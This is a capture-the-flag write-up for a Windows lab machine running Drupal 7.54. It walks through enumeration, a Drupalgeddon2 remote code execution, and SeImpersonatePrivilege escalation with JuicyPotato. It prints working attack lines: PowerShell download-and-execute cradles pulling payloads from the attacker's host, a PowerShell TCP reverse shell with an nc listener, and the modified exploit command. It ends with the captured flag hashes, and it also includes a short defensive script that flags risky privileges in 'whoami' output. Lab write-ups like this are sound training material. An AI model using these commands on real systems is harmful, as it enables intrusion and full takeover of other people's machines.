IP: 10.10.10.9
OS: Windows
Drupal / SeImpersonatePrivilege
Introduction
We will take advantage of an RCE in Drupal to get a reverse shell.
Once on the system, we will escalate privileges with SeImpersonatePrivilege.
Enumeration
nmap -p- --open -sS --min-rate 5000 -v -sC -sV -n 10.10.10.9 -oN bastand.nmap
80/tcp open http Microsoft IIS httpd 7.5
|_http-favicon: Unknown favicon MD5: CF2445DCB53A031C02F9B57E2199BC03
|_http-generator: Drupal 7 (http://drupal.org)
| http-methods:
| Supported Methods: OPTIONS TRACE GET HEAD POST
|_ Potentially risky methods: TRACE
| http-robots.txt: 36 disallowed entries (15 shown)
| /includes/ /misc/ /modules/ /profiles/ /scripts/
| /themes/ /CHANGELOG.txt /cron.php /INSTALL.mysql.txt
| /INSTALL.pgsql.txt /INSTALL.sqlite.txt /install.php /INSTALL.txt
|_/LICENSE.txt /MAINTAINERS.txt
|_http-server-header: Microsoft-IIS/7.5
|_http-title: Welcome to 10.10.10.9 | 10.10.10.9
135/tcp open msrpc Microsoft Windows RPC
49154/tcp open msrpc Microsoft Windows RPC
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
whatweb 10.10.10.9
http://10.10.10.9 [200 OK] Content-Language[en], Country[RESERVED][ZZ], Drupal, HTTPServer[Microsoft-IIS/7.5], IP[10.10.10.9], JQuery, MetaGenerator[Drupal 7 (http://drupal.org)], Microsoft-IIS[7.5], PHP[5.3.28,], PasswordField[pass], Script[text/javascript], Title[Welcome to 10.10.10.9 | 10.10.10.9], UncommonHeaders[x-content-type-options,x-generator], X-Frame-Options[SAMEORIGIN], X-Powered-By[PHP/5.3.28, ASP.NET]
Whatweb reveals two important things: our victim is a Windows host, and the system is running Drupal 7, which is vulnerable to a highly critical vulnerability, Drupalgeddon2 (CVE-2018-7600).
The vulnerability enables remote code execution and results from insufficient input validation in the Drupal 7 Form API.
More info: https://unit42.paloaltonetworks.com/unit42-exploit-wild-drupalgeddon2-analysis-cve-2018-7600/
Let's check the version:
curl -s http://10.10.10.9/CHANGELOG.txt | head
Drupal 7.54,
Now let's see what exploits we can use:
searchsploit drupal 7.54
------------------------------------------------------------------------------------------------------------------------------------ ---------------------------------
Exploit Title | Path
Drupal < 7.58 - 'Drupalgeddon3' (Authenticated) Remote Code (Metasploit) | php/webapps/44557.rb
Drupal < 7.58 - 'Drupalgeddon3' (Authenticated) Remote Code Execution (PoC) | php/webapps/44542.txt
Drupal < 7.58 / < 8.3.9 / < 8.4.6 / < 8.5.1 - 'Drupalgeddon2' Remote Code Execution | php/webapps/44449.rb
Drupal < 8.3.9 / < 8.4.6 / < 8.5.1 - 'Drupalgeddon2' Remote Code Execution (Metasploit) | php/remote/44482.rb
Drupal < 8.3.9 / < 8.4.6 / < 8.5.1 - 'Drupalgeddon2' Remote Code Execution (PoC) | php/webapps/44448.py
Drupal < 8.5.11 / < 8.6.10 - RESTful Web Services unserialize() Remote Command Execution (Metasploit) | php/remote/46510.rb
Drupal < 8.6.10 / < 8.5.11 - REST Module Remote Code Execution | php/webapps/46452.txt
Drupal < 8.6.9 - REST Module Remote Code Execution | php/webapps/46459.py
We can use Drupal < 7.58 / < 8.3.9 / < 8.4.6 / < 8.5.1 - 'Drupalgeddon2' Remote Code Execution | php/webapps/44449.rb
Foothold
If we have a look at 44449.rb, we only need to make a small modification to the exploit in order to get a reverse shell from Windows:
# Final command to execute
# cmd = "#{bashcmd} | tee #{webshellpath}"
cmd = "powershell -c IEX (New-Object Net.WebClient).downloadstring('http://10.10.14.8/drupal.ps1')"
drupal.ps1 is a copy of Invoke-PowerShellTcp.ps1, modified only to trigger the reverse shell.
We added this end line to drupal.ps1:
Invoke-PowerShellTcp -Reverse -IPAddress 10.10.14.8 -Port 443
Then we execute the exploit:
ruby 44449.rb http://10.10.10.9
We start our HTTP server to serve the drupal.ps1 script, which the victim downloads and runs to open a reverse shell to our attacking machine:
python -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
10.10.10.9 - - [30/Jan/2022 17:15:54] "GET /drupal.ps1 HTTP/1.1" 200 -
Here we will get the reverse shell:
rlwrap nc -nvlp 443
listening on [any] 443 ...
connect to [10.10.14.8] from (UNKNOWN) [10.10.10.9] 49493
Windows PowerShell running as user BASTARD$ on BASTARD
Copyright (C) 2015 Microsoft Corporation. All rights reserved.
Privilege Escalation
PS C:\windows\temp\temp> whoami /all
USER INFORMATION
----------------
User Name SID
================= ========
nt authority\iusr S-1-5-17
GROUP INFORMATION
-----------------
Group Name Type SID Attributes
==================================== ================ ============ ==================================================
Mandatory Label\High Mandatory Level Label S-1-16-12288
Everyone Well-known group S-1-1-0 Mandatory group, Enabled by default, Enabled group
BUILTIN\Users Alias S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\SERVICE Well-known group S-1-5-6 Group used for deny only
CONSOLE LOGON Well-known group S-1-2-1 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users Well-known group S-1-5-11 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization Well-known group S-1-5-15 Mandatory group, Enabled by default, Enabled group
LOCAL Well-known group S-1-2-0 Mandatory group, Enabled by default, Enabled group
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
======================= ========================================= =======
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeImpersonatePrivilege Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege Create global objects Enabled
PS C:\windows\temp\temp>
Since SeImpersonatePrivilege is enabled, we will use the JuicyPotato technique to escalate our privileges.
We upload the binary:
(new-object net.webclient).downloadfile('http://10.10.14.8/JuicyPotato.exe', 'C:\windows\temp\jp.exe')
and the batch file that JuicyPotato will launch:
(new-object net.webclient).downloadfile('http://10.10.14.8/rv.bat', 'C:\windows\temp\rv.bat')
rv.bat contains:
powershell.exe -c iex(new-object net.webclient).downloadstring('http://10.10.14.8/Invoke-PowerShellTcp.ps1')
./jp.exe -l 1337 -t * -p C:\windows\temp\temp\rv.bat -c "{9B1F122C-2982-4e91-AA8B-E071D54F2A4D}"
root@kali:/home/alter# rlwrap nc -nlvp 443
listening on [any] 443 ...
connect to [10.10.14.8] from (UNKNOWN) [10.10.10.9] 49499
Windows PowerShell running as user BASTARD$ on BASTARD
Copyright (C) 2015 Microsoft Corporation. All rights reserved.
PS C:\Windows\system32>whoami
nt authority\system
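The escalation above works because the IIS service account holds SeImpersonatePrivilege. As an added example, not part of the original writeup, this Python script parses a captured `whoami /all` listing like the one above and flags the impersonation-class privileges that make a potato-style escalation possible, so the check can be run over shell transcripts or service-account audits; the sample text is constructed from the output shown earlier.

```python
import re

# Token privileges that let a service account obtain a SYSTEM token
# (what JuicyPotato and similar tools rely on).
RISKY_PRIVILEGES = {
    "SeImpersonatePrivilege",         # impersonate a client after authentication
    "SeAssignPrimaryTokenPrivilege",  # replace a process-level token
}

# Constructed sample modelled on the PRIVILEGES INFORMATION table above,
# with one extra disabled row to show that State is honoured.
SAMPLE_WHOAMI = """PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                               State
============================= ========================================= ========
SeChangeNotifyPrivilege       Bypass traverse checking                  Enabled
SeImpersonatePrivilege        Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege       Create global objects                     Enabled
SeAssignPrimaryTokenPrivilege Replace a process level token             Disabled
"""

# One privilege row: name, free-text description, then the State column.
PRIV_LINE = re.compile(r"^(Se\w+Privilege)\s+.*?\s+(Enabled|Disabled)\s*$",
                       re.MULTILINE)

def parse_privileges(whoami_text):
    """Map privilege name -> True if Enabled, False if Disabled."""
    return {name: state == "Enabled"
            for name, state in PRIV_LINE.findall(whoami_text)}

def enabled_risky(whoami_text):
    """Sorted list of risky privileges that are enabled on the token."""
    privs = parse_privileges(whoami_text)
    return sorted(p for p in RISKY_PRIVILEGES if privs.get(p))

def report(whoami_text):
    """One-line verdict suitable for an audit log."""
    risky = enabled_risky(whoami_text)
    if not risky:
        return "OK: no impersonation-class privileges enabled"
    return "RISK: potato-class escalation possible via " + ", ".join(risky)

if __name__ == "__main__":
    print(report(SAMPLE_WHOAMI))
```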
PS C:\Windows\system32> cd
Directory: C:\Users\Administrator\Desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-ar-- 19/3/2017 7:34 ?? 32 root.txt.txt
PS C:\Users\Administrator\Desktop> type root.txt.txt
4bf12b963da1b30cc93496f617f7ba7c
PS C:\Users\dimitris\Desktop> dir
Directory: C:\Users\dimitris\Desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-ar-- 19/3/2017 8:06 ?? 32 user.txt
PS C:\Users\dimitris\Desktop> type user.txt
ba22fde1932d06eb76a163d312f921a2